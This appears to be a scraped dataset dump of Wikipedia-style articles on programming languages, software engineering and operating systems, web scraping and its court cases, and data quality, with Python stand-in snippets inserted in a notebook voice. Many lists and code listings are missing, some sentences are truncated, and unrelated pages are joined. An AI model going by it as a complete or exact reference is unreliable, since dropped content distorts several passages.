Its purpose was to store patient medical records. The computer supported a disk operating system to run a Memorex, 3 megabyte, hard disk drive. 29 It had a color display and keyboard that was packaged in a single console. The disk operating system was programmed using IBM's Basic Assembly Language (BAL). The medical records application was programmed using a BASIC interpreter. 29 However, the computer was an evolutionary dead-end because it was extremely expensive. Also, it was built at a public university lab for a specific purpose. 37 Nonetheless, the project contributed to the development of the Intel 8080 (1974) instruction set. 29 In 1978, the modern software development environment began when Intel upgraded the Intel 8080 to the Intel 8086. Intel simplified the Intel 8086 to manufacture the cheaper Intel 8088. 38 IBM embraced the Intel 8088 when they entered the personal computer market (1981). As consumer demand for personal computers increased, so did Intel's microprocessor development. The succession of development is known as the x86 series. The x86 assembly language is a family of backward-compatible machine instructions. Machine instructions created in earlier microprocessors were retained throughout microprocessor upgrades. This enabled consumers to purchase new computers without having to purchase new application software. 
The major categories of instructions are: c VLSI circuits enabled the programming environment to advance from a computer terminal (until the 1990s) to a graphical user interface (GUI) computer. Computer terminals limited programmers to a single shell running in a command-line environment. During the 1970s, full-screen source code editing became possible through a text-based user interface. Regardless of the technology available, the goal is to program in a programming language. Programming language features exist to provide building blocks to be combined to express programming ideals. 39 Ideally, a programming language should: 39 The programming style of a programming language to provide these building blocks may be categorized into programming paradigms. 40 For example, different paradigms may differentiate: 40 Each of these programming styles has contributed to the synthesis of different programming languages. 40 A programming language is a set of keywords, symbols, identifiers, and rules by which programmers can communicate instructions to the computer. 41 They follow a set of rules called a syntax. 41 Programming languages get their basis from formal languages. 42 The purpose of defining a solution in terms of its formal language is to generate an algorithm to solve the underlining problem. 42 An algorithm is a sequence of simple instructions that solve a problem. 43 The evolution of programming languages began when the EDSAC (1949) used the first stored computer program in its von Neumann architecture. 44 Programming the EDSAC was in the first generation of programming language. Imperative languages specify a sequential algorithm using declarations, expressions, and statements: 52 FORTRAN (1958) was unveiled as "The IBM Mathematical FORmula TRANslating system". It was designed for scientific calculations, without string handling facilities. Along with declarations, expressions, and statements, it supported: It succeeded because: However, non-IBM vendors also wrote Fortran compilers, but with a syntax that would likely fail IBM's compiler. 54 The American National Standards Institute (ANSI) developed the first Fortran standard in 1966. In 1978, Fortran 77 became the standard until 1991. Fortran 90 supports: COBOL (1959) stands for "COmmon Business Oriented Language". Fortran manipulated symbols. It was soon realized that symbols did not need to be numbers, so strings were introduced. 55 The US Department of Defense influenced COBOL's development, with Grace Hopper being a major contributor. The statements were English-like and verbose. The goal was to design a language so managers could read the programs. However, the lack of structured statements hindered this goal. 56 COBOL's development was tightly controlled, so dialects did not emerge to require ANSI standards. As a consequence, it was not changed for 15 years until 1974. The 1990s version did make consequential changes, like object-oriented programming. 56 ALGOL (1960) stands for "ALGOrithmic Language". It had a profound influence on programming language design. 57 Emerging from a committee of European and American programming language experts, it used standard mathematical notation and had a readable, structured design. Algol was first to define its syntax using the Backus Naur form. 57 This led to syntax-directed compilers. It added features like: Algol's direct descendants include Pascal, Modula 2, Ada, Delphi and Oberon on one branch. On another branch the descendants include C, C and Java. 
57 BASIC (1964) stands for "Beginner's All-Purpose Symbolic Instruction Code". It was developed at Dartmouth College for all of their students to learn. 8 If a student did not go on to a more powerful language, the student would still remember Basic. 8 A Basic interpreter was installed in the microcomputers manufactured in the late 1970s. As the microcomputer industry grew, so did the language. 8 Basic pioneered the interactive session. 8 It offered operating system commands within its environment. However, the Basic syntax was too simple for large programs. 8 Recent dialects added structure and object-oriented extensions. Microsoft's Visual Basic is still widely used and produces a graphical user interface. 7 C programming language (1973) got its name because the language BCPL was replaced with B, and AT&T Bell Labs called the next version "C". Its purpose was to write the UNIX operating system. 50 C is a relatively small language, making it easy to write compilers. Its growth mirrored the hardware growth in the 1980s. 50 Its growth was also because it has the facilities of assembly language, but uses a high-level syntax. It added advanced features. C allows the programmer to control the region of memory in which data is to be stored. Global variables and static variables require the fewest clock cycles to store. The stack is automatically used for the standard variable declarations. Heap memory is returned to a pointer variable from the malloc() function. In the 1970s, software engineers needed language support to break large projects down into modules. 65 One obvious feature was to decompose large projects physically into separate files. A less obvious feature was to decompose large projects logically into abstract data types. 65 At the time, languages supported concrete (scalar) datatypes like integer numbers, floating-point numbers, and strings of characters. Abstract datatypes are structures of concrete datatypes, with a new name assigned. For example, a list of integers could be called integer list. In object-oriented jargon, abstract datatypes are called classes. However, a class is only a definition; no memory is allocated. When memory is allocated to a class and bound to an identifier, it is called an object. 66 Object-oriented imperative languages developed by combining the need for classes and the need for safe functional programming. 67 A function, in an object-oriented language, is assigned to a class. An assigned function is then referred to as a method, member function, or operation. Object-oriented programming is executing operations on objects. 68 Object-oriented languages support a syntax to model subset/superset relationships. In set theory, an element of a subset inherits all the attributes contained in the superset. For example, a student is a person. Therefore, the set of students is a subset of the set of persons. As a result, students inherit all the attributes common to all persons. Additionally, students have unique attributes that other people do not have. Object-oriented languages model subset/superset relationships using inheritance. 69 Object-oriented programming became the dominant language paradigm by the late 1990s. 65 C++ (1985) was originally called "C with Classes". 70 It was designed to expand C's capabilities by adding the object-oriented facilities of the language Simula. 71 An object-oriented module is composed of two files. The definitions file is called the header file.
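The next part of the scraped article refers to C++ header and source files for GRADE, PERSON, and STUDENT classes in a simple school application, but those listings were not captured. As a stand-in only — written in Python rather than the article's C++, with member names that are assumptions — here is a compact sketch of the ideas just described: a constructor, and a STUDENT class that inherits from PERSON the way a subset inherits the attributes of its superset.

# Not the article's C++ code: a Python stand-in for the school-application classes
# it describes; the member names (letter, name, grade) are illustrative assumptions.
class Grade:
    def __init__(self, letter):            # constructor, run when the object is created
        self.letter = letter

class Person:
    def __init__(self, name):
        self.name = name
    def describe(self):                     # a method: an operation assigned to the class
        return f"{self.name} is a person"

class Student(Person):                      # Student inherits every Person attribute
    def __init__(self, name, grade):
        super().__init__(name)              # reuse the superclass constructor
        self.grade = grade                  # plus an attribute other people do not have
    def describe(self):
        return f"{self.name} is a student with grade {self.grade.letter}"

print(Student("Ada", Grade("A")).describe())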
Here is a C++ header file for the GRADE class in a simple school application: A constructor operation is a function with the same name as the class name. 72 It is executed when the calling operation executes the new statement. A module's other file is the source file. Here is a C++ source file for the GRADE class in a simple school application: Here is a C++ header file for the PERSON class in a simple school application: Here is a C++ source file for the PERSON class in a simple school application: Here is a C++ header file for the STUDENT class in a simple school application: Here is a C++ source file for the STUDENT class in a simple school application: Here is a driver program for demonstration: Here is a makefile to compile everything: Imperative languages have one major criticism: assigning an expression to a non-local variable may produce an unintended side effect. 73 Declarative languages generally omit the assignment statement and the control flow. They describe what computation should be performed and not how to compute it. Two broad categories of declarative languages are functional languages and logical languages. The principle behind a functional language is to use lambda calculus as a guide for a well-defined semantic. 74 In mathematics, a function is a rule that maps elements from an expression to a range of values. Consider the function: times 10(x) = 10 * x. The expression 10 * x is mapped by the function times 10() to a range of values. One value happens to be 20. This occurs when x is 2. So, the application of the function is mathematically written as: times 10(2) = 20. A functional language compiler will not store this value in a variable. Instead, it will push the value onto the computer's stack before setting the program counter back to the calling function. The calling function will then pop the value from the stack. 75 Imperative languages do support functions. Therefore, functional programming can be achieved in an imperative language, if the programmer uses discipline. However, a functional language will force this discipline onto the programmer through its syntax. Functional languages have a syntax tailored to emphasize the what. 76 A functional program is developed with a set of primitive functions followed by a single driver function. 73 Consider the snippet: function max( a, b ) code omitted function min( a, b ) code omitted function range( a, b, c ) The primitives are max() and min(). The driver function is range(). Executing: put( range( 10, 4, 7) ); will output 6. Functional languages are used in computer science research to explore new language features. 77 Moreover, their lack of side-effects has made them popular in parallel programming and concurrent programming. 78 However, application developers prefer the object-oriented features of imperative languages. 78 Lisp (1958) stands for "LISt Processor". 79 It is tailored to process lists. A full structure of the data is formed by building lists of lists. In memory, a tree data structure is built. Internally, the tree structure lends itself nicely to recursive functions. 80 The syntax to build a tree is to enclose the space-separated elements within parentheses. The following is a list of three elements. The first two elements are themselves lists of two elements: ((A B) (HELLO WORLD) 94) Lisp has functions to extract and reconstruct elements. 81 The function head() returns a list containing the first element in the list. The function tail() returns a list containing everything but the first element.
The function cons() returns a list that is the concatenation of other lists. Therefore, the following expression will return the list x: cons(head(x), tail(x)) One drawback of Lisp is when many functions are nested, the parentheses may look confusing. 76 Modern Lisp environments help ensure parenthesis match. As an aside, Lisp does support the imperative language operations of the assignment statement and goto loops. 82 Also, Lisp is not concerned with the datatype of the elements at compile time. 83 Instead, it assigns (and may reassign) the datatypes at runtime. Assigning the datatype at runtime is called dynamic binding. 84 Whereas dynamic binding increases the language's flexibility, programming errors may linger until late in the software development process. 84 Writing large, reliable, and readable Lisp programs requires forethought. If properly planned, the program may be much shorter than an equivalent imperative language program. 76 Lisp is widely used in artificial intelligence. However, its usage has been accepted only because it has imperative language operations, making unintended side-effects possible. 78 ML (1973) 85 stands for "Meta Language". ML checks to make sure only data of the same type are compared with one another. 86 For example, this function has one input parameter (an integer) and returns an integer: ML is not parenthesis-eccentric like Lisp. The following is an application of times 10(): It returns "20 : int". (Both the results and the datatype are returned.) Like Lisp, ML is tailored to process lists. Unlike Lisp, each element is the same datatype. 87 Moreover, ML assigns the datatype of an element at compile-time. Assigning the datatype at compile-time is called static binding. Static binding increases reliability because the compiler checks the context of variables before they are used. 88 Prolog (1972) stands for "PROgramming in LOGic". It is a logic programming language, based on formal logic. The language was developed by Alain Colmerauer and Philippe Roussel in Marseille, France. It is an implementation of Selective Linear Definite clause resolution, pioneered by Robert Kowalski and others at the University of Edinburgh. 89 The building blocks of a Prolog program are facts and rules. Here is a simple example: After all the facts and rules are entered, then a question can be asked: The following example shows how Prolog will convert a letter grade to its numeric value: Here is a comprehensive example: 90 1) All dragons billow fire, or equivalently, a thing billows fire if the thing is a dragon: 2) A creature billows fire if one of its parents billows fire: 3) A thing X is a parent of a thing Y if X is the mother of Y or X is the father of Y: 4) A thing is a creature if the thing is a dragon: 5) Norberta is a dragon, and Puff is a creature. Norberta is the mother of Puff. Rule (2) is a recursive (inductive) definition. It can be understood declaratively, without the need to understand how it is executed. Rule (3) shows how functions are represented by using relations. Here, the mother and father functions ensure that every individual has only one mother and only one father. Prolog is an untyped language. Nonetheless, inheritance can be represented by using predicates. Rule (4) asserts that a creature is a superclass of a dragon. Questions are answered using backward reasoning. Given the question: Prolog generates two answers : Practical applications for Prolog are knowledge representation and problem solving in artificial intelligence. 
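The declarative-language passage above describes a functional driver range() built on the primitives max() and min() (so that range(10, 4, 7) yields 6), and Lisp primitives head(), tail(), and cons() for which cons(head(x), tail(x)) returns the original list x. The bodies of those snippets were lost in scraping, so the Python below is only an illustration of the same ideas under stated assumptions — in particular, reproducing the quoted output of 6 as the maximum minus the minimum is an assumption, and the driver is named range_of to avoid shadowing Python's built-in range.

# Illustrative Python, not the source's functional-language or Lisp code.
def head(lst):
    return lst[:1]                    # a list containing only the first element

def tail(lst):
    return lst[1:]                    # everything but the first element

def cons(a, b):
    return a + b                      # concatenation of two lists

def range_of(a, b, c):                # assumed body for the "range" driver in the text
    return max(a, b, c) - min(a, b, c)

x = [["A", "B"], ["HELLO", "WORLD"], 94]
print(cons(head(x), tail(x)) == x)    # True: rebuilding the list leaves it unchanged
print(range_of(10, 4, 7))             # 6, matching the output quoted in the text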
Object-oriented programming is a programming method to execute operations (functions) on objects. 91 The basic idea is to group the characteristics of a phenomenon into an object container and give the container a name. The operations on the phenomenon are also grouped into the container. 91 Object-oriented programming developed by combining the need for containers and the need for safe functional programming. 92 This programming method need not be confined to an object-oriented language. 93 In an object-oriented language, an object container is called a class. In a non-object-oriented language, a data structure (which is also known as a record) may become an object container. To turn a data structure into an object container, operations need to be written specifically for the structure. The resulting structure is called an abstract datatype. 94 However, inheritance will be missing. Nonetheless, this shortcoming can be overcome. Here is a C programming language header file for the GRADE abstract datatype in a simple school application: The grade new() function performs the same algorithm as the C constructor operation. Here is a C programming language source file for the GRADE abstract datatype in a simple school application: In the constructor, the function calloc() is used instead of malloc() because each memory cell will be set to zero. Here is a C programming language header file for the PERSON abstract datatype in a simple school application: Here is a C programming language source file for the PERSON abstract datatype in a simple school application: Here is a C programming language header file for the STUDENT abstract datatype in a simple school application: Here is a C programming language source file for the STUDENT abstract datatype in a simple school application: Here is a driver program for demonstration: Here is a makefile to compile everything: The formal strategy to build object-oriented objects is to: 95 For example: The syntax of a computer program is a list of production rules which form its grammar. 96 A programming language's grammar correctly places its declarations, expressions, and statements. 97 Complementing the syntax of a language are its semantics. The semantics describe the meanings attached to various syntactic constructs. 98 A syntactic construct may need a semantic description because a production rule may have an invalid interpretation. 99 Also, different languages might have the same syntax; however, their behaviors may be different. The syntax of a language is formally described by listing the production rules. Whereas the syntax of a natural language is extremely complicated, a subset of the English language can have this production rule listing: 100 The words in bold-face are known as non-terminals. The words in 'single quotes' are known as terminals. 101 From this production rule listing, complete sentences may be formed using a series of replacements. 102 The process is to replace non-terminals with either a valid non-terminal or a valid terminal. The replacement process repeats until only terminals remain. One valid sentence is: However, another combination results in an invalid sentence: Therefore, a semantic is necessary to correctly describe the meaning of an eat activity. One production rule listing method is called the Backus Naur form (BNF). 103 BNF describes the syntax of a language and itself has a syntax. This recursive definition is an example of a meta-language. 
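Earlier in this passage the article explains how a non-object-oriented language can still provide object containers: define a data structure plus functions dedicated to it (an abstract datatype), with a function such as grade_new() playing the role of a constructor. The C listings it refers to were not captured, so the sketch below only mirrors the idea in Python, with a plain dict standing in for the C struct; the field names are assumptions.

# Not the article's C code: a Python illustration of the abstract-datatype idea,
# using a dict as the record and free functions instead of methods.
def grade_new(letter):
    # Plays the role of the constructor; every field starts from a known value,
    # much as the text notes calloc() zero-fills the memory it allocates.
    return {"letter": letter, "points": 0.0}

def grade_set_points(grade, points):
    grade["points"] = points

def grade_describe(grade):
    return f"grade {grade['letter']} worth {grade['points']} points"

g = grade_new("A")
grade_set_points(g, 4.0)
print(grade_describe(g))  # grade A worth 4.0 points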
98 The syntax of BNF includes: Using BNF, a subset of the English language can have this production rule listing: Using BNF, a signed-integer has the production rule listing: 104 Notice the recursive production rule: This allows for an infinite number of possibilities. Therefore, a semantic is necessary to describe a limitation of the number of digits. Notice the leading zero possibility in the production rules: Therefore, a semantic is necessary to describe that leading zeros need to be ignored. Two formal methods are available to describe semantics. They are denotational semantics and axiomatic semantics. 105 Software engineering is a variety of techniques to produce quality computer programs. 106 Computer programming is the process of writing or editing source code. In a formal environment, a systems analyst will gather information from managers about all the organization's processes to automate. This professional then prepares a detailed plan for the new or modified system. 107 The plan is analogous to an architect's blueprint. 107 The systems analyst has the objective to deliver the right information to the right person at the right time. 108 The critical factors to achieve this objective are: 108 Achieving performance objectives should be balanced with all of the costs, including: 109 Applying a systems development process will mitigate the axiom: the later in the process an error is detected, the more expensive it is to correct. 110 The waterfall model is an implementation of a systems development process. 111 As the waterfall label implies, the basic phases overlap each other: 112 A computer programmer is a specialist responsible for writing or modifying the source code to implement the detailed plan. 107 A programming team is likely to be needed because most systems are too large to be completed by a single programmer. 114 However, adding programmers to a project may not shorten the completion time. Instead, it may lower the quality of the system. 114 To be effective, program modules need to be defined and distributed to team members. 114 Also, team members must interact with one another in a meaningful and effective way. 114 Computer programmers may be programming in the small: programming within a single module. 115 Chances are a module will execute modules located in other source code files. Therefore, computer programmers may be programming in the large: programming modules so they will effectively couple with each other. 115 Programming-in-the-large includes contributing to the application programming interface (API). Modular programming is a technique to refine imperative language programs. Refined programs may reduce the software size, separate responsibilities, and thereby mitigate software aging. A program module is a sequence of statements that are bounded within a block and together identified by a name. 116 Modules have a function, context, and logic: 117 The module's name should be derived first by its function, then by its context. Its logic should not be part of the name. 117 For example, function compute square root( x ) or function compute square root integer( i : integer ) are appropriate module names. However, function compute square root by division( x ) is not. The degree of interaction within a module is its level of cohesion. 117 Cohesion is a judgment of the relationship between a module's name and its function. The degree of interaction between modules is the level of coupling. 
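Returning to the BNF discussion earlier in this passage: the signed-integer production rules themselves were lost in scraping, so the sketch below assumes a grammar of the shape signed-integer ::= '+' integer | '-' integer and integer ::= digit | digit integer. It is an illustration, not the article's listing; it shows how the recursive rule admits arbitrarily many digits and why a separate semantic rule about leading zeros is still needed.

# Illustration only, under the assumed grammar stated above.
def is_integer(s):
    if len(s) == 1:
        return s.isdigit()                       # base case: a single digit
    return s[0].isdigit() and is_integer(s[1:])  # recursive rule: digit then integer

def is_signed_integer(s):
    return len(s) > 1 and s[0] in "+-" and is_integer(s[1:])

print(is_signed_integer("-042"))  # True syntactically; a semantic rule must still say
                                  # that leading zeros are to be ignored
print(is_signed_integer("+x1"))   # False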
118 Coupling is a judgment of the relationship between a module's context and the elements being performed upon. The levels of cohesion from worst to best are: 119 The levels of coupling from worst to best are: 118 Data flow analysis is a design method used to achieve modules of functional cohesion and data coupling. 120 The input to the method is a data-flow diagram. A data-flow diagram is a set of ovals representing modules. Each module's name is displayed inside its oval. Modules may be at the executable level or the function level. The diagram also has arrows connecting modules to each other. Arrows pointing into modules represent a set of inputs. Each module should have only one arrow pointing out from it to represent its single output object. (Optionally, an additional exception arrow points out.) A daisy chain of ovals will convey an entire algorithm. The input modules should start the diagram. The input modules should connect to the transform modules. The transform modules should connect to the output modules. 121 Computer programs may be categorized along functional lines. The main functional categories are application software and system software. System software includes the operating system, which couples computer hardware with application software. 122 The purpose of the operating system is to provide an environment where application software executes in a convenient and efficient manner. 122 Both application software and system software execute utility programs. At the hardware level, a microcode program controls the circuits throughout the central processing unit. Application software is the key to unlocking the potential of the computer system. 123 Enterprise application software bundles accounting, personnel, customer, and vendor applications. Examples include enterprise resource planning, customer relationship management, and supply chain management software. Enterprise applications may be developed in-house as one-of-a-kind proprietary software. 124 Alternatively, they may be purchased as off-the-shelf software. Purchased software may be modified to provide custom software. If the application is customized, then either the company's resources are used or the resources are outsourced. Outsourced software development may be from the original software vendor or a third-party developer. 125 The potential advantages of in-house software are that features and reports may be developed exactly to specification. 126 Management may also be involved in the development process and offer a level of control. 127 Management may decide to counteract a competitor's new initiative or implement a customer or vendor requirement. 128 A merger or acquisition may necessitate enterprise software changes. The potential disadvantages of in-house software are that time and resource costs may be extensive. 124 Furthermore, risks concerning features and performance may be looming. The potential advantages of off-the-shelf software are that upfront costs are identifiable, the basic needs should be fulfilled, and its performance and reliability have a track record. 124 The potential disadvantages of off-the-shelf software are that it may have unnecessary features that confuse end users, it may lack features the enterprise needs, and the data flow may not match the enterprise's work processes. 124 One approach to economically obtaining a customized enterprise application is through an application service provider. 129 Specialty companies provide hardware, custom software, and end-user support. 
They may speed the development of new applications because they possess skilled information system staff. The biggest advantage is it frees in-house resources from staffing and managing complex computer projects. 129 Many application service providers target small, fast-growing companies with limited information system resources. 129 On the other hand, larger companies with major systems will likely have their technical infrastructure in place. One risk is having to trust an external organization with sensitive information. Another risk is having to trust the provider's infrastructure reliability. 129 An operating system is the low-level software that supports a computer's basic functions, such as scheduling processes and controlling peripherals. 122 In the 1950s, the programmer, who was also the operator, would write a program and run it. After the program finished executing, the output may have been printed, or it may have been punched onto paper tape or cards for later processing. 28 More often than not the program did not work. The programmer then looked at the console lights and fiddled with the console switches. If less fortunate, a memory printout was made for further study. In the 1960s, programmers reduced the amount of wasted time by automating the operator's job. A program called an operating system was kept in the computer at all times. 130 The term operating system may refer to two levels of software. 131 The operating system may refer to the kernel program that manages the processes, memory, and devices. More broadly, the operating system may refer to the entire package of the central software. The package includes a kernel program, command-line interpreter, graphical user interface, utility programs, and editor. 131 The kernel's main purpose is to manage the limited resources of a computer: Originally, operating systems were programmed in assembly; however, modern operating systems are typically written in higher-level languages like C, Objective-C, and Swift. k A utility program is designed to aid system administration and software execution. Operating systems execute hardware utility programs to check the status of disk drives, memory, speakers, and printers. 140 A utility program may optimize the placement of a file on a crowded disk. System utility programs monitor hardware and network performance. When a metric is outside an acceptable range, a trigger alert is generated. 141 Utility programs include compression programs so data files are stored on less disk space. 140 Compressed programs also save time when data files are transmitted over the network. 140 Utility programs can sort and merge data sets. 141 Utility programs detect computer viruses. 141 A microcode program is the bottom-level interpreter that controls the data path of software-driven computers. 142 (Advances in hardware have migrated these operations to hardware execution circuits.) 142 Microcode instructions allow the programmer to more easily implement the digital logic level 143 —the computer's real hardware. The digital logic level is the boundary between computer science and computer engineering. 144 A logic gate is a tiny transistor that can return one of two signals: on or off. 145 These five gates form the building blocks of binary algebra—the digital logic functions of the computer. Microcode instructions are mnemonics programmers may use to execute digital logic functions instead of forming them in binary algebra. They are stored in a central processing unit's (CPU) control store. 
146 These hardware-level instructions move data throughout the data path. The micro-instruction cycle begins when the microsequencer uses its microprogram counter to fetch the next machine instruction from random-access memory. 147 The next step is to decode the machine instruction by selecting the proper output line to the hardware module. 148 The final step is to execute the instruction using the hardware module's set of gates. Instructions to perform arithmetic are passed through an arithmetic logic unit (ALU). 149 The ALU has circuits to perform elementary operations to add, shift, and compare integers. By combining and looping the elementary operations through the ALU, the CPU performs its complex arithmetic. Microcode instructions move data between the CPU and the memory controller. Memory controller microcode instructions manipulate two registers. The memory address register is used to access each memory cell's address. The memory data register is used to set and read each cell's contents. 150 Microcode instructions move data between the CPU and the many computer buses. The disk controller bus writes to and reads from hard disk drives. Data is also moved between the CPU and other functional units via the peripheral component interconnect express bus. 151 |
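The signed-integer production rules and the recursive rule discussed in the scraped text above can be made concrete with a short recognizer. The following is a minimal, illustrative sketch in Python (the language used elsewhere in this notebook), not code from the article; the exact <sign> rule is an assumption made for the example.

# Hypothetical illustration of the grammar discussed above (not from the scraped article):
#   <signed-integer> ::= <sign> <integer>
#   <integer>        ::= <digit> | <digit> <integer>     (the recursive rule)
#   <sign>           ::= '+' | '-' | ''                  (assumed for this sketch)

def parse_integer(s):
    """Recognize <integer> ::= <digit> | <digit> <integer> by direct recursion."""
    if not s or s[0] not in "0123456789":
        return False
    return len(s) == 1 or parse_integer(s[1:])

def parse_signed_integer(s):
    """Recognize <signed-integer> ::= <sign> <integer>."""
    if s and s[0] in "+-":
        s = s[1:]
    return parse_integer(s)

print(parse_signed_integer("-0042"))  # True: the grammar allows leading zeros (a semantic rule must ignore them)
print(parse_signed_integer("12a3"))   # False: 'a' is not a <digit>

Because the <integer> rule refers to itself, the recognizer accepts arbitrarily many digits, which is exactly why the text notes that a separate semantic rule must bound the digit count and discard leading zeros.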
288 | https://en.wikipedia.org/wiki/Web_scraping | https://tr.wikipedia.org/wiki/Web_kaz%C4%B1ma | Web scraping (Turkish: Web kazıma; also web harvesting or web data extraction) is a computer software technique for extracting information from websites. Such software programs usually simulate human exploration of the World Wide Web either by implementing the low-level Hypertext Transfer Protocol (HTTP) or by embedding a fully fledged web browser such as Mozilla Firefox. Web scraping is closely related to web indexing, which indexes information on the web using a bot or web crawler and is a universal technique adopted by most search engines. In contrast, web scraping focuses on transforming unstructured data on the web, typically in HTML format, into structured data that can be stored and analyzed in a central local database or in spreadsheets. Web scraping is also related to web automation, which simulates human browsing with a computer program. Uses of web scraping include online price comparison, contact scraping, weather data monitoring, website change detection, research, web mashups, and web data integration. Web scraping is the process of automatically collecting information from the World Wide Web. It is a field of active development that shares a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence, and human-computer interaction. Current web scraping solutions range from ad hoc approaches requiring human effort to fully automated systems that can convert entire websites into structured information, with some limitations. Web scraping may be against the terms of use of some websites, and the enforceability of these terms is unclear. While outright duplication of original expression will in many cases be illegal, the United States courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for trespass to chattels, which treats the computer system itself as personal property onto which the scraper's user is trespassing. The best known of these cases, eBay v. Bidder's Edge, ended with an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay website. That case involved the automatic placing of bids, known as auction sniping. However, to succeed on a claim of trespass to chattels, the plaintiff must show that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 2 One of the first major screen-scraping tests involved American Airlines (AA) and a firm called FareChase.
AA successfully obtained an injunction from a Texas trial court stopping FareChase from selling software that lets users compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003; by June, FareChase and AA agreed to settle and the appeal was dropped. 3 Southwest Airlines has also challenged screen-scraping practices and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that screen scraping is illegal because it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" to Southwest's site. It also claimed that the practice constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". Southwest further claimed that screen scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as a breach of the website's user agreement. Outtask denied all of these claims, arguing that the prevailing law should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved by the Supreme Court of the United States, FareChase was eventually shuttered by its parent company Yahoo!, and Outtask was purchased by the travel expense company Concur. In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked its IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and the IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act. Although these early scraping decisions and the theories of liability are not uniform, it is hard to ignore the emerging pattern that courts are prepared to protect proprietary content on commercial sites from uses that are unwanted by the sites' owners. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 4 While the law in this area becomes more settled, entities contemplating the use of scraping programs to access a public website should also consider whether such action is authorized, by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States district court for the eastern district of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse wrap contract or license to be enforced. In a 2014 case filed in the United States District Court for the Eastern District of Pennsylvania, the e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly scraping QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests per minute to QVC's website, at times up to 36,000 requests per minute), causing QVC's site to crash for two days and resulting in lost sales for QVC. QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address, which prevented QVC from quickly repairing the problem.
This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. At the time of the case, the link to the plaintiff's terms of use was displayed among all of the site's links at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed favored common browse wrap contracting practices. 5 Outside the United States, in February 2006 the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking of the real estate site Home.dk by the portal site OfiR.dk did not conflict with Danish law or the database directive of the European Union. 6 In 2009 Facebook won one of the first copyright suits against a known web scraper. This laid the groundwork for numerous lawsuits that tie web scraping to direct copyright violation and very clear monetary damages, the most recent being AP v. Meltwater, in which the courts set aside what is referred to as fair use on the internet. 7 A February 2010 case complicated by matters of jurisdiction saw Ireland's High Court deliver a verdict that illustrates the inchoate state of developing case law. In Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's click-wrap agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and of the Danish Maritime and Commercial Court, Mr Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing on the user the onus of agreeing to the terms and conditions in order to access online services was sufficient to comprise a contractual relationship. The decision is under appeal to Ireland's Supreme Court. 8 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this applies only to email addresses. 9 10 The administrator of a website can use various measures to stop or slow a bot. Some techniques include: Web Scraping: Everything You Wanted to Know (but were afraid to ask). 11 |
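The workflow described in the scraped article above (fetch a page over HTTP, then turn its unstructured HTML into usable text) can be sketched with the same libraries this notebook already imports (requests, BeautifulSoup, html5lib). This is an illustrative sketch, not code from the article; the Wikipedia URL in the usage comment is just a convenient example target.

import requests
from bs4 import BeautifulSoup

def scrape_paragraphs(url):
    """Fetch a page over HTTP and return its paragraph text (unstructured HTML -> plain text)."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()                      # fail loudly on HTTP errors
    soup = BeautifulSoup(response.text, "html5lib")  # parser installed at the top of this notebook
    return [p.get_text(strip=True) for p in soup.find_all("p")]

# Example usage:
# for paragraph in scrape_paragraphs("https://en.wikipedia.org/wiki/Web_scraping"):
#     print(paragraph)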
289 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_quality | Data quality refers to the state of qualitative or quantitative pieces of information. There are many definitions of data quality, but data is generally considered high quality if it is "fit for its intended uses in operations, decision making and planning". 1 2 3 Moreover, data is deemed of high quality if it correctly represents the real-world construct to which it refers. Furthermore, apart from these definitions, as the number of data sources increases, the question of internal data consistency becomes significant, regardless of fitness for use for any particular external purpose. People's views on data quality can often be in disagreement, even when discussing the same set of data used for the same purpose. When this is the case, data governance is used to form agreed upon definitions and standards for data quality. In such cases, data cleansing, including standardization, may be required in order to ensure data quality. 4 Defining data quality is difficult due to the many contexts data are used in, as well as the varying perspectives among end users, producers, and custodians of data. 5 From a consumer perspective, data quality is: 5 From a business perspective, data quality is: From a standards-based perspective, data quality is: Arguably, in all these cases, "data quality" is a comparison of the actual state of a particular set of data to a desired state, with the desired state typically referred to as "fit for use", "to specification", "meeting consumer expectations", "free of defect", or "meeting requirements". These expectations, specifications, and requirements are usually defined by one or more individuals or groups, standards organizations, laws and regulations, business policies, or software development policies. 5 Drilling down further, those expectations, specifications, and requirements are stated in terms of characteristics or dimensions of the data, such as: 5 6 7 8 11 A systematic scoping review of the 